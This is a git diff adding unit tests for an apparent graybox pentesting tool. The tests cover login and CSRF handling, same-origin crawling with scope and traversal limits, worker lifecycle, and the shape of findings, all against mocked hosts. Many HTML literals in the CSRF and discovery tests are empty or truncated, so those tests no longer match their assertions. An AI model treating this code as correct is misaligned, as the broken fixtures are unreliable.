"""Triage query returns found=False when no mutable state exists yet.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.chainstore_hgetall.side_effect = [ + {"fin-job": stub}, + {}, + ] + plugin.chainstore_hget.side_effect = [ + [], + ] + + result = Plugin.get_job_triage(plugin, job_id="fin-job", finding_id="missing") + + self.assertFalse(result["found"]) + self.assertEqual(result["audit"], []) + + +class TestPhase2AuditCounting(unittest.TestCase): + """Phase 2: audit counts include graybox findings.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def test_close_job_audit_counts_graybox_findings(self): + """_close_job audit nr_findings includes graybox results.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.ee_addr = "node-A" + plugin.cfg_instance_id = "test-instance" + plugin.global_shmem = {} + plugin.log.get_localhost_ip.return_value = "127.0.0.1" + plugin.P = MagicMock() + plugin.json_dumps.return_value = "{}" + plugin.r1fs.add_json.return_value = "QmWorkerReport" + plugin._get_job_config = MagicMock(return_value={"redact_credentials": False}) + plugin._redact_report = MagicMock(side_effect=lambda r: r) + plugin._normalize_job_record = MagicMock(side_effect=lambda job_id, raw: (job_id, raw)) + plugin._log_audit_event = MagicMock() + plugin._count_nested_findings = lambda section: Plugin._count_nested_findings(section) + plugin._count_all_findings = lambda report: Plugin._count_all_findings(plugin, report) + + report = { + "start_port": 443, + "end_port": 443, + "ports_scanned": 1, + "open_ports": [443], + "service_info": { + "443": 
{"_service_info_https": {"findings": [{"title": "svc"}]}}, + }, + "web_tests_info": { + "443": {"_web_test_xss": {"findings": [{"title": "web"}]}}, + }, + "correlation_findings": [{"title": "corr"}], + "graybox_results": { + "443": {"_graybox_test": {"findings": [{"scenario_id": "S1"}, {"scenario_id": "S2"}]}}, + }, + } + + worker = MagicMock() + worker.get_status.return_value = report + plugin.scan_jobs = {"job-1": {"local-1": worker}} + plugin._get_aggregated_report = MagicMock(return_value=report) + + job_specs = { + "job_id": "job-1", + "target": "example.com", + "workers": {"node-A": {"start_port": 443, "end_port": 443}}, + "job_config_cid": "QmConfig", + } + plugin.chainstore_hget.return_value = job_specs + plugin.chainstore_hset = MagicMock() + + Plugin._close_job(plugin, "job-1") + + plugin._log_audit_event.assert_called_once() + event_type, details = plugin._log_audit_event.call_args[0] + self.assertEqual(event_type, "scan_completed") + self.assertEqual(details["nr_findings"], 5) diff --git a/extensions/business/cybersec/red_mesh/tests/test_auth.py b/extensions/business/cybersec/red_mesh/tests/test_auth.py new file mode 100644 index 00000000..7ca8abcf --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_auth.py @@ -0,0 +1,329 @@ +"""Tests for AuthManager.""" + +import time +import unittest +from unittest.mock import MagicMock, patch, PropertyMock + +from extensions.business.cybersec.red_mesh.graybox.auth import AuthManager +from extensions.business.cybersec.red_mesh.graybox.models.target_config import GrayboxTargetConfig +from extensions.business.cybersec.red_mesh.constants import GRAYBOX_SESSION_MAX_AGE + + +def _make_auth(**overrides): + """Build an AuthManager with defaults.""" + defaults = dict( + target_url="http://testapp.local:8000", + target_config=GrayboxTargetConfig(), + verify_tls=False, + ) + defaults.update(overrides) + return AuthManager(**defaults) + + +def _mock_response(status=200, text="", 
url="http://testapp.local:8000/dashboard/", + history=None, cookies=None, content_type="text/html"): + """Build a mock requests.Response.""" + resp = MagicMock() + resp.status_code = status + resp.text = text + resp.url = url + resp.history = history or [] + resp.headers = {"content-type": content_type} + resp.json.return_value = {} + if cookies is not None: + resp.cookies = cookies + return resp + + +class TestCsrfAutoDetect(unittest.TestCase): + + def test_csrf_autodetect_django(self): + """Finds Django csrfmiddlewaretoken.""" + auth = _make_auth() + html = '' + field, token = auth._extract_csrf(html) + self.assertEqual(field, "csrfmiddlewaretoken") + self.assertEqual(token, "abc123") + + def test_csrf_autodetect_flask(self): + """Finds Flask/WTForms csrf_token.""" + auth = _make_auth() + html = '' + field, token = auth._extract_csrf(html) + self.assertEqual(field, "csrf_token") + self.assertEqual(token, "flask-token-xyz") + + def test_csrf_autodetect_rails(self): + """Finds Rails authenticity_token.""" + auth = _make_auth() + html = '' + field, token = auth._extract_csrf(html) + self.assertEqual(field, "authenticity_token") + self.assertEqual(token, "rails-tok") + + def test_csrf_autodetect_fallback(self): + """Fallback finds generic hidden input with 'csrf' in name.""" + auth = _make_auth() + html = '' + field, token = auth._extract_csrf(html) + self.assertEqual(field, "my_csrf_thing") + self.assertEqual(token, "custom-tok") + + def test_csrf_configured_override(self): + """Configured csrf_field overrides auto-detection.""" + cfg = GrayboxTargetConfig(csrf_field="custom_token") + auth = _make_auth(target_config=cfg) + html = '' + field, token = auth._extract_csrf(html) + self.assertEqual(field, "custom_token") + self.assertEqual(token, "override-val") + + def test_csrf_field_property(self): + """detected_csrf_field is exposed as a property.""" + auth = _make_auth() + self.assertIsNone(auth.detected_csrf_field) + html = '' + auth._extract_csrf(html) + 
self.assertEqual(auth.detected_csrf_field, "csrf_token") + + def test_csrf_none_when_missing(self): + """Returns (None, None) when no CSRF field found.""" + auth = _make_auth() + field, token = auth._extract_csrf("
    ") + self.assertIsNone(field) + self.assertIsNone(token) + + def test_extract_csrf_value_public_api(self): + """Static extract_csrf_value works for probes.""" + html = '' + val = AuthManager.extract_csrf_value(html, "csrf_token") + self.assertEqual(val, "pub-tok") + + +class TestLoginSuccessDetection(unittest.TestCase): + + def _check(self, auth, response, cookies=None): + """Helper to call _is_login_success with a mock session.""" + session = MagicMock() + session.cookies.get_dict.return_value = cookies or {} + return auth._is_login_success(response, session, "http://testapp.local:8000/auth/login/") + + def test_login_success_redirect_with_cookies(self): + """Redirect away from login + cookies -> success.""" + auth = _make_auth() + resp = _mock_response(url="http://testapp.local:8000/dashboard/", history=[MagicMock()]) + self.assertTrue(self._check(auth, resp, cookies={"sessionid": "abc"})) + + def test_login_redirect_no_cookies(self): + """Redirect without cookies -> failure.""" + auth = _make_auth() + resp = _mock_response(url="http://testapp.local:8000/dashboard/", history=[MagicMock()]) + self.assertFalse(self._check(auth, resp, cookies={})) + + def test_login_success_spa(self): + """No redirect, cookies set -> success (SPA login).""" + auth = _make_auth() + resp = _mock_response(url="http://testapp.local:8000/auth/login/") + self.assertTrue(self._check(auth, resp, cookies={"token": "jwt-val"})) + + def test_login_failure_multiword(self): + """'login failed' in body -> failure.""" + auth = _make_auth() + resp = _mock_response(text="

    Login failed. Please try again.

    ") + self.assertFalse(self._check(auth, resp, cookies={"sessionid": "x"})) + + def test_login_no_false_negative(self): + """Page with 'failed' in dashboard text (not a failure marker) -> success if cookies set.""" + auth = _make_auth() + resp = _mock_response( + url="http://testapp.local:8000/dashboard/", + text="

    3 failed login attempts detected on your account.

    ", + history=[MagicMock()], + ) + self.assertTrue(self._check(auth, resp, cookies={"sessionid": "x"})) + + def test_login_failure_json_error(self): + """JSON {"error": "bad creds"} -> failure.""" + auth = _make_auth() + resp = _mock_response( + url="http://testapp.local:8000/auth/login/", + content_type="application/json", + ) + resp.json.return_value = {"error": "bad credentials"} + self.assertFalse(self._check(auth, resp, cookies={})) + + def test_login_failure_json_success_false(self): + """JSON {"success": false} -> failure.""" + auth = _make_auth() + resp = _mock_response( + url="http://testapp.local:8000/auth/login/", + content_type="application/json", + ) + resp.json.return_value = {"success": False} + self.assertFalse(self._check(auth, resp, cookies={})) + + def test_login_success_json(self): + """JSON {"authenticated": true} + cookies -> success.""" + auth = _make_auth() + resp = _mock_response( + url="http://testapp.local:8000/auth/login/", + content_type="application/json", + ) + resp.json.return_value = {"authenticated": True} + self.assertTrue(self._check(auth, resp, cookies={"token": "jwt"})) + + def test_login_failure_status(self): + """401 -> failure.""" + auth = _make_auth() + resp = _mock_response(status=401) + self.assertFalse(self._check(auth, resp, cookies={"sessionid": "x"})) + + +class TestAuthManagerLifecycle(unittest.TestCase): + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + def test_try_credentials_public(self, mock_requests): + """try_credentials returns session on success, None on failure.""" + auth = _make_auth() + # Mock login flow: GET returns CSRF, POST redirects with cookies + mock_session = MagicMock() + mock_session.get.return_value = _mock_response( + text='' + ) + post_resp = _mock_response( + url="http://testapp.local:8000/dashboard/", + history=[MagicMock()], + ) + mock_session.post.return_value = post_resp + mock_session.cookies.get_dict.return_value = {"sessionid": "abc"} + 
mock_requests.Session.return_value = mock_session + + result = auth.try_credentials("admin", "pass") + self.assertIsNotNone(result) + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + def test_make_anonymous_session(self, mock_requests): + """make_anonymous_session returns a fresh session.""" + auth = _make_auth() + session = auth.make_anonymous_session() + self.assertIsNotNone(session) + + def test_session_expiry(self): + """is_expired returns True after GRAYBOX_SESSION_MAX_AGE.""" + auth = _make_auth() + auth._created_at = time.time() - GRAYBOX_SESSION_MAX_AGE - 1 + self.assertTrue(auth.is_expired) + + def test_session_not_expired(self): + """is_expired returns False for fresh session.""" + auth = _make_auth() + auth._created_at = time.time() + self.assertFalse(auth.is_expired) + + def test_auth_state_reflects_session_status(self): + """auth_state exposes a typed snapshot of current session state.""" + auth = _make_auth() + auth.official_session = MagicMock() + auth.regular_session = None + auth._auth_errors = ["official_login_failed"] + auth._refresh_count = 2 + + state = auth.auth_state + + self.assertTrue(state.official_authenticated) + self.assertFalse(state.regular_authenticated) + self.assertEqual(state.refresh_count, 2) + self.assertEqual(state.auth_errors, ("official_login_failed",)) + + def test_cleanup_closes_sessions(self): + """cleanup() closes all sessions.""" + auth = _make_auth() + auth.official_session = MagicMock() + auth.regular_session = MagicMock() + auth.anon_session = MagicMock() + auth._created_at = time.time() + auth.cleanup() + auth.official_session is None # already set to None + auth.regular_session is None + auth.anon_session is None + self.assertEqual(auth._created_at, 0.0) + + def test_ensure_sessions_failed_refresh_clears_stale_sessions(self): + """Failed refresh tears down stale sessions instead of leaving mixed state.""" + auth = _make_auth() + auth.official_session = MagicMock() + auth.regular_session = 
MagicMock() + auth._created_at = time.time() - GRAYBOX_SESSION_MAX_AGE - 1 + + with patch.object(auth, "authenticate", return_value=False) as mock_auth: + result = auth.ensure_sessions({"username": "admin", "password": "secret"}) + + self.assertFalse(result) + self.assertIsNone(auth.official_session) + self.assertIsNone(auth.regular_session) + self.assertEqual(auth.auth_state.refresh_count, 1) + mock_auth.assert_called_once() + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + @patch("extensions.business.cybersec.red_mesh.graybox.auth.time.sleep") + def test_authenticate_retries_transient_transport_error(self, mock_sleep, mock_requests): + """Transient transport failures retry once before giving up.""" + import requests as real_requests + + auth = _make_auth() + first_session = MagicMock() + second_session = MagicMock() + first_session.get.side_effect = real_requests.ConnectionError("temporary failure") + second_session.get.return_value = _mock_response( + text='' + ) + second_session.post.return_value = _mock_response( + url="http://testapp.local:8000/dashboard/", + history=[MagicMock()], + ) + second_session.cookies.get_dict.return_value = {"sessionid": "abc"} + mock_requests.Session.side_effect = [MagicMock(), first_session, second_session] + mock_requests.RequestException = real_requests.RequestException + + result = auth.authenticate({"username": "admin", "password": "secret"}) + + self.assertTrue(result) + self.assertIs(auth.official_session, second_session) + mock_sleep.assert_called_once() + self.assertEqual(auth._auth_errors, []) + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + def test_preflight_unreachable(self, mock_requests): + """preflight_check returns error for unreachable target.""" + import requests as real_requests + mock_requests.head.side_effect = real_requests.ConnectionError("refused") + mock_requests.RequestException = real_requests.RequestException + auth = _make_auth() + err = 
auth.preflight_check() + self.assertIsNotNone(err) + self.assertIn("unreachable", err.lower()) + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + def test_preflight_login_404(self, mock_requests): + """preflight_check returns error if login page returns 404.""" + mock_requests.head.return_value = _mock_response(status=200) + mock_requests.get.return_value = _mock_response(status=404) + mock_requests.RequestException = Exception + auth = _make_auth() + err = auth.preflight_check() + self.assertIsNotNone(err) + self.assertIn("404", err) + + @patch("extensions.business.cybersec.red_mesh.graybox.auth.requests") + def test_preflight_ok(self, mock_requests): + """preflight_check returns None when target and login page are reachable.""" + mock_requests.head.return_value = _mock_response(status=200) + mock_requests.get.return_value = _mock_response(status=200) + mock_requests.RequestException = Exception + auth = _make_auth() + err = auth.preflight_check() + self.assertIsNone(err) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_base_worker.py b/extensions/business/cybersec/red_mesh/tests/test_base_worker.py new file mode 100644 index 00000000..79fb41ab --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_base_worker.py @@ -0,0 +1,253 @@ +""" +Contract enforcement tests for BaseLocalWorker. + +Verifies the abstract base class contract is correctly implemented +and that PentestLocalWorker's retrofit preserves all API-facing behavior. 
+""" + +import threading +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.worker.base import BaseLocalWorker +from extensions.business.cybersec.red_mesh.worker import PentestLocalWorker +from .conftest import DummyOwner + + +def _make_pentest_worker(**overrides): + """Helper: create a PentestLocalWorker with sensible defaults.""" + defaults = dict( + owner=DummyOwner(), + target="127.0.0.1", + job_id="test-job", + initiator="test-addr", + local_id_prefix="1", + worker_target_ports=[80, 443], + ) + defaults.update(overrides) + return PentestLocalWorker(**defaults) + + +class TestBaseLocalWorkerContract(unittest.TestCase): + """Verify BaseLocalWorker enforces the API contract.""" + + # ── Abstract method enforcement ── + + def test_cannot_instantiate_base(self): + """BaseLocalWorker is abstract — cannot be instantiated directly.""" + with self.assertRaises(TypeError): + BaseLocalWorker( + owner=MagicMock(), job_id="test", initiator="addr", + local_id_prefix="1", target="127.0.0.1", + ) + + # ── Shared attribute initialization ── + + def test_pentest_worker_is_base_worker(self): + """PentestLocalWorker inherits from BaseLocalWorker.""" + self.assertTrue(issubclass(PentestLocalWorker, BaseLocalWorker)) + + def test_shared_attributes_set(self): + """Base __init__ sets all shared attributes.""" + owner = DummyOwner() + worker = PentestLocalWorker( + owner=owner, target="127.0.0.1", job_id="j1", + initiator="addr", local_id_prefix="1", + worker_target_ports=[80, 443], + ) + self.assertIs(worker.owner, owner) + self.assertEqual(worker.job_id, "j1") + self.assertEqual(worker.initiator, "addr") + self.assertEqual(worker.target, "127.0.0.1") + self.assertTrue(worker.local_worker_id.startswith("RM-1-")) + self.assertIsNone(worker.thread) # set by start() + self.assertIsNone(worker.stop_event) # set by start() + self.assertTrue(hasattr(worker, 'metrics')) + self.assertTrue(hasattr(worker, 'initial_ports')) + 
self.assertTrue(hasattr(worker, 'state')) + + # ── Threading contract ── + + def test_start_creates_thread_and_event(self): + """start() sets thread and stop_event.""" + worker = _make_pentest_worker() + worker.execute_job = lambda: None + worker.start() + self.assertIsInstance(worker.thread, threading.Thread) + self.assertIsInstance(worker.stop_event, threading.Event) + worker.thread.join(timeout=2) + + def test_stop_sets_event_and_canceled(self): + """stop() sets the stop_event AND state['canceled'].""" + worker = _make_pentest_worker() + worker.execute_job = lambda: None + worker.start() + worker.stop() + self.assertTrue(worker.stop_event.is_set()) + self.assertTrue(worker.state["canceled"]) + worker.thread.join(timeout=2) + + def test_check_stopped_after_stop(self): + """_check_stopped() returns True after stop_event is set.""" + worker = _make_pentest_worker() + worker.stop_event = threading.Event() + worker.state["done"] = False + self.assertFalse(worker._check_stopped()) + worker.stop_event.set() + self.assertTrue(worker._check_stopped()) + + def test_check_stopped_when_done(self): + """_check_stopped() returns True when state['done'] is True.""" + worker = _make_pentest_worker() + worker.stop_event = threading.Event() + worker.state["done"] = True + self.assertTrue(worker._check_stopped()) + + def test_check_stopped_when_canceled(self): + """_check_stopped() returns True when state['canceled'] is True.""" + worker = _make_pentest_worker() + worker.stop_event = threading.Event() + worker.state["canceled"] = True + self.assertTrue(worker._check_stopped()) + + def test_check_stopped_before_start(self): + """_check_stopped() works even before start() (stop_event is None).""" + worker = _make_pentest_worker() + self.assertIsNone(worker.stop_event) + self.assertFalse(worker._check_stopped()) + + # ── State dict contract ── + + def test_state_has_required_keys(self): + """State dict has all keys the API reads.""" + worker = _make_pentest_worker() + required_keys = 
[ + "done", "canceled", "open_ports", "ports_scanned", + "completed_tests", "service_info", "web_tests_info", + "port_protocols", "correlation_findings", + ] + for key in required_keys: + self.assertIn(key, worker.state, f"Missing state key: {key}") + + def test_ports_scanned_is_list(self): + """ports_scanned must be a list (API calls len() on it).""" + worker = _make_pentest_worker() + self.assertIsInstance(worker.state["ports_scanned"], list) + + def test_open_ports_is_list(self): + """open_ports must be a list (API calls set.update() on it).""" + worker = _make_pentest_worker() + self.assertIsInstance(worker.state["open_ports"], list) + + def test_done_defaults_false(self): + self.assertFalse(_make_pentest_worker().state["done"]) + + def test_canceled_defaults_false(self): + self.assertFalse(_make_pentest_worker().state["canceled"]) + + # ── initial_ports contract ── + + def test_initial_ports_is_list(self): + """initial_ports must be a list (API calls len() on it).""" + worker = _make_pentest_worker() + self.assertIsInstance(worker.initial_ports, list) + self.assertGreater(len(worker.initial_ports), 0) + + # ── local_worker_id contract ── + + def test_local_worker_id_is_string(self): + worker = _make_pentest_worker() + self.assertIsInstance(worker.local_worker_id, str) + self.assertTrue(worker.local_worker_id.startswith("RM-")) + + # ── get_status contract ── + + def test_get_status_returns_dict(self): + worker = _make_pentest_worker() + status = worker.get_status() + self.assertIsInstance(status, dict) + + def test_get_status_has_required_keys(self): + """get_status() returns all keys needed by _close_job.""" + worker = _make_pentest_worker() + status = worker.get_status() + required = [ + "job_id", "initiator", "target", + "open_ports", "ports_scanned", "completed_tests", + "service_info", "web_tests_info", "port_protocols", + "correlation_findings", "scan_metrics", + ] + for key in required: + self.assertIn(key, status, f"Missing status key: {key}") + + def 
test_get_status_scan_metrics_is_dict(self): + worker = _make_pentest_worker() + status = worker.get_status() + self.assertIsInstance(status["scan_metrics"], dict) + + # ── get_worker_specific_result_fields contract ── + + def test_result_fields_is_static(self): + """get_worker_specific_result_fields is a static method returning dict.""" + fields = PentestLocalWorker.get_worker_specific_result_fields() + self.assertIsInstance(fields, dict) + + def test_result_fields_has_core_keys(self): + """Aggregation fields include the keys the API expects.""" + fields = PentestLocalWorker.get_worker_specific_result_fields() + required = [ + "open_ports", "service_info", "web_tests_info", + "completed_tests", "port_protocols", "correlation_findings", + "scan_metrics", + ] + for key in required: + self.assertIn(key, fields, f"Missing aggregation field: {key}") + + # ── P() logging ── + + def test_p_delegates_to_owner(self): + owner = DummyOwner() + worker = PentestLocalWorker( + owner=owner, target="t", job_id="j", + initiator="a", local_id_prefix="1", + worker_target_ports=[80], + ) + worker.P("test message") + self.assertTrue(len(owner.messages) > 0) + # Find the "test message" log entry (init also logs) + matching = [m for m in owner.messages if "test message" in m] + self.assertTrue(len(matching) > 0, "P() did not delegate to owner") + self.assertIn(worker.local_worker_id, matching[0]) + + +class TestPentestWorkerRetrofit(unittest.TestCase): + """Verify PentestLocalWorker still works after BaseLocalWorker retrofit.""" + + def test_mro_has_base(self): + """BaseLocalWorker is in the MRO.""" + self.assertIn(BaseLocalWorker, PentestLocalWorker.__mro__) + + def test_start_stop_inherited(self): + """start() and stop() come from BaseLocalWorker, not redefined.""" + self.assertNotIn('start', PentestLocalWorker.__dict__) + self.assertNotIn('stop', PentestLocalWorker.__dict__) + + def test_check_stopped_inherited(self): + self.assertNotIn('_check_stopped', PentestLocalWorker.__dict__) + 
+ def test_p_inherited(self): + self.assertNotIn('P', PentestLocalWorker.__dict__) + + def test_execute_job_overridden(self): + """execute_job is defined on PentestLocalWorker (not inherited).""" + self.assertIn('execute_job', PentestLocalWorker.__dict__) + + def test_get_status_overridden(self): + self.assertIn('get_status', PentestLocalWorker.__dict__) + + def test_get_worker_specific_result_fields_overridden(self): + self.assertIn('get_worker_specific_result_fields', PentestLocalWorker.__dict__) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_contracts.py b/extensions/business/cybersec/red_mesh/tests/test_contracts.py new file mode 100644 index 00000000..0c6d031a --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_contracts.py @@ -0,0 +1,108 @@ +import json +import unittest + +from extensions.business.cybersec.red_mesh.findings import Finding, Severity, probe_result +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin +from extensions.business.cybersec.red_mesh.models.archive import JobArchive + + +class _ReportHost(_ReportMixin): + def P(self, *_args, **_kwargs): + return None + + def json_dumps(self, payload, **kwargs): + return json.dumps(payload, **kwargs) + + +class TestArchiveContracts(unittest.TestCase): + + def test_archive_roundtrip_preserves_version(self): + archive = JobArchive( + archive_version=1, + job_id="job-1", + job_config={"target": "example.com"}, + timeline=[], + passes=[{"pass_nr": 1, "risk_score": 10}], + ui_aggregate={"total_open_ports": [], "total_services": 0, "total_findings": 0}, + duration=1.0, + date_created=1.0, + date_completed=2.0, + ) + + payload = archive.to_dict() + restored = JobArchive.from_dict(payload) + + self.assertEqual(restored.archive_version, 1) + self.assertEqual(restored.to_dict(), payload) + + +class 
TestFindingContracts(unittest.TestCase): + + def test_network_probe_result_exposes_required_finding_shape(self): + finding = Finding( + severity=Severity.HIGH, + title="Weak TLS", + description="TLS config is weak", + evidence="TLS 1.0 enabled", + confidence="firm", + ) + + result = probe_result(findings=[finding]) + persisted = result["findings"][0] + + for key in ("severity", "title", "description", "evidence", "confidence"): + self.assertIn(key, persisted) + + def test_graybox_flat_finding_exposes_required_contract_fields(self): + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="IDOR", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cwe=["CWE-639"], + evidence=["endpoint=/api/records/2", "status=200"], + ) + + flat = finding.to_flat_finding(port=443, protocol="https", probe_name="access_control") + + for key in ( + "finding_id", + "severity", + "title", + "description", + "evidence", + "confidence", + "port", + "protocol", + "probe", + "category", + "probe_type", + ): + self.assertIn(key, flat) + + +class TestAggregationContracts(unittest.TestCase): + + def test_aggregation_is_deterministic_under_worker_order_variation(self): + host = _ReportHost() + worker_a = { + "open_ports": [80], + "ports_scanned": [80], + "completed_tests": ["probe-a"], + "service_info": {"80": {"_service_info_http": {"findings": [{"title": "A"}]}}}, + } + worker_b = { + "open_ports": [443], + "ports_scanned": [443], + "completed_tests": ["probe-b"], + "service_info": {"443": {"_service_info_https": {"findings": [{"title": "B"}]}}}, + } + + first = host._get_aggregated_report({"worker-a": worker_a, "worker-b": worker_b}) + second = host._get_aggregated_report({"worker-b": worker_b, "worker-a": worker_a}) + + self.assertEqual(sorted(first["open_ports"]), sorted(second["open_ports"])) + self.assertEqual(first["service_info"], second["service_info"]) + self.assertEqual(set(first["completed_tests"]), set(second["completed_tests"])) diff --git 
a/extensions/business/cybersec/red_mesh/tests/test_discovery.py b/extensions/business/cybersec/red_mesh/tests/test_discovery.py new file mode 100644 index 00000000..4f2c51f1 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_discovery.py @@ -0,0 +1,228 @@ +"""Tests for DiscoveryModule.""" + +import unittest +from collections import deque +from unittest.mock import MagicMock, patch + +from extensions.business.cybersec.red_mesh.graybox.discovery import DiscoveryModule, _RouteParser +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, DiscoveryConfig, +) +from extensions.business.cybersec.red_mesh.graybox.models import DiscoveryResult + + +def _mock_response(status=200, text="", content_type="text/html"): + resp = MagicMock() + resp.status_code = status + resp.text = text + resp.headers = {"Content-Type": content_type} + return resp + + +def _make_discovery(scope_prefix="", max_pages=50, max_depth=3, routes_html=None): + """Build a DiscoveryModule with mocked HTTP.""" + cfg = GrayboxTargetConfig( + discovery=DiscoveryConfig(scope_prefix=scope_prefix, max_pages=max_pages, max_depth=max_depth), + ) + auth = MagicMock() + safety = MagicMock() + safety.throttle = MagicMock() + + # Build mock session that returns different HTML per path + session = MagicMock() + routes_html = routes_html or {} + + def mock_get(url, **kwargs): + for path, html in routes_html.items(): + if url.endswith(path) or url == "http://testapp.local:8000" + path: + return _mock_response(text=html) + return _mock_response(text="") + + session.get.side_effect = mock_get + auth.official_session = session + auth.anon_session = session + + disc = DiscoveryModule( + target_url="http://testapp.local:8000", + auth_manager=auth, + safety=safety, + target_config=cfg, + ) + return disc + + +class TestDiscoveryModule(unittest.TestCase): + + def test_same_origin_only(self): + """External links are ignored.""" + disc = 
_make_discovery(routes_html={ + "/": '
    AboutEvil', + }) + routes, forms = disc.discover() + self.assertIn("/about/", routes) + # No external domain route + for r in routes: + self.assertFalse(r.startswith("http"), f"External route leaked: {r}") + + def test_scope_prefix(self): + """Only routes under prefix are discovered.""" + disc = _make_discovery( + scope_prefix="/api/", + routes_html={ + "/": 'UsersAdmin', + }, + ) + # Root "/" is outside scope but is the seed — it will be visited + # because it's the starting point. But discovered links outside scope are not followed. + routes, forms = disc.discover() + # /api/users/ should be in routes (it's in scope) + self.assertIn("/api/users/", routes) + # /admin/ should NOT be in routes (out of scope) + self.assertNotIn("/admin/", routes) + + def test_scope_prefix_traversal(self): + """Path traversal /api/../admin/ is normalized and blocked.""" + disc = _make_discovery( + scope_prefix="/api/", + routes_html={ + "/api/": 'TraversalData', + }, + ) + routes, forms = disc.discover(["/api/"]) + # /admin/secrets should be blocked (normalized from /api/../admin/secrets) + self.assertNotIn("/admin/secrets", routes) + + def test_max_pages(self): + """Stops after page limit.""" + # Create a chain of pages that would go forever + html_map = {} + for i in range(100): + html_map[f"/page/{i}/"] = f'Next' + + disc = _make_discovery(max_pages=5, routes_html=html_map) + routes, _ = disc.discover(["/page/0/"]) + # Should stop at 5 pages + self.assertLessEqual(len(routes), 5) + + def test_max_depth(self): + """Stops at depth limit.""" + disc = _make_discovery( + max_depth=1, + routes_html={ + "/": 'L1', + "/level1/": 'L2', + "/level1/level2/": 'L3', + }, + ) + routes, _ = disc.discover() + self.assertIn("/level1/", routes) + # level2 should NOT be discovered (depth 2 > max_depth 1) + self.assertNotIn("/level1/level2/", routes) + + def test_form_actions_recorded_not_followed(self): + """Forms are collected but their actions are not visited.""" + disc = 
_make_discovery(routes_html={ + "/": '
    About', + }) + routes, forms = disc.discover() + self.assertIn("/api/submit/", forms) + self.assertIn("/about/", routes) + + def test_discover_result_returns_typed_payload(self): + disc = _make_discovery(routes_html={ + "/": 'About
    ', + }) + result = disc.discover_result() + self.assertIsInstance(result, DiscoveryResult) + self.assertIn("/about/", result.routes) + self.assertIn("/api/submit/", result.forms) + + def test_known_routes_included(self): + """User-supplied routes are added to BFS queue.""" + disc = _make_discovery(routes_html={ + "/custom/": 'Sub', + }) + routes, _ = disc.discover(known_routes=["/custom/"]) + self.assertIn("/custom/", routes) + + def test_empty_html(self): + """Pages with no links still appear in routes.""" + disc = _make_discovery(routes_html={ + "/": 'Hello', + }) + routes, _ = disc.discover() + self.assertIn("/", routes) + self.assertEqual(len(routes), 1) + + def test_non_html_skipped(self): + """Non-HTML responses are added to routes but not parsed.""" + cfg = GrayboxTargetConfig(discovery=DiscoveryConfig()) + auth = MagicMock() + safety = MagicMock() + session = MagicMock() + + def mock_get(url, **kwargs): + if "/api/data" in url: + return _mock_response(text='{"key": "value"}', content_type="application/json") + return _mock_response(text='API') + + session.get.side_effect = mock_get + auth.official_session = session + auth.anon_session = session + + disc = DiscoveryModule("http://testapp.local:8000", auth, safety, cfg) + routes, _ = disc.discover() + self.assertIn("/api/data", routes) + + +class TestRouteParser(unittest.TestCase): + + def test_extracts_links_and_forms(self): + """Parser extracts href and form action.""" + parser = _RouteParser() + parser.feed('P1
    ') + self.assertEqual(parser.links, ["/page1/"]) + self.assertEqual(parser.forms, ["/submit/"]) + + def test_ignores_empty_href(self): + """Links without href are ignored.""" + parser = _RouteParser() + parser.feed('No href') + self.assertEqual(parser.links, []) + + +class TestNormalize(unittest.TestCase): + + def test_javascript_ignored(self): + """javascript: links return empty string.""" + disc = _make_discovery() + self.assertEqual(disc._normalize("javascript:void(0)"), "") + + def test_mailto_ignored(self): + disc = _make_discovery() + self.assertEqual(disc._normalize("mailto:a@b.com"), "") + + def test_hash_ignored(self): + disc = _make_discovery() + self.assertEqual(disc._normalize("#section"), "") + + def test_relative_path(self): + disc = _make_discovery() + result = disc._normalize("/api/users/") + self.assertEqual(result, "/api/users/") + + def test_dotdot_collapsed(self): + """.. segments are collapsed.""" + disc = _make_discovery() + result = disc._normalize("/api/../admin/") + self.assertEqual(result, "/admin/") + + def test_external_rejected(self): + """External domain links return empty.""" + disc = _make_discovery() + result = disc._normalize("https://other.com/path") + self.assertEqual(result, "") + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_graybox_finding.py b/extensions/business/cybersec/red_mesh/tests/test_graybox_finding.py new file mode 100644 index 00000000..a457e58f --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_graybox_finding.py @@ -0,0 +1,194 @@ +"""Tests for GrayboxFinding model.""" + +import json +import unittest + +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxEvidenceArtifact, GrayboxFinding + + +class TestGrayboxFinding(unittest.TestCase): + + def _make_finding(self, **overrides): + defaults = dict( + scenario_id="PT-A01-01", + title="IDOR on /api/records/", + status="vulnerable", + severity="HIGH", + 
